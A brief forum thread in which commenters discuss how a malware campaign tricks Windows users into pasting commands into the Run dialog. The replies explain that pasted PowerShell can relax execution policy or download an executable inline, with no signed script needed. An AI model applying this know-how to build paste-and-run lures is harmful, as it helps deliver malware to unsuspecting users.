Comment by AshamedCaptain

Comment by AshamedCaptain a year ago

I do not understand how this works. I thought the default PS policy on all versions of Windows was not to run "unsigned" PS scripts by default (precisely for this reason). Or at least I've personally seen that a myriad times.

So, are these malware scripts signed, has MS relaxed the default PS policy, do users relax it, or has this malware found another way around it?

antonyt a year ago

The attack has the user paste content into the Windows run dialog. That could include spawning an admin Powershell and running `Set-ExecutionPolicy -ExecutionPolicy Unrestricted` before running a remote script. Or more likely what nullindividual said - the download and start of the exe is entirely contained in what the user is pasting in.

Reply View 0 replies

nullindividual a year ago

It's not a script, which would be a .ps1 file, but from the sounds of it the actual script block/PowerShell function which isn't governed by the signing policy. It could simply be an Invoke-WebRequest to download that executable indicated in the article.

Reply View 0 replies

[removed] a year ago

[deleted]

Reply View 0 replies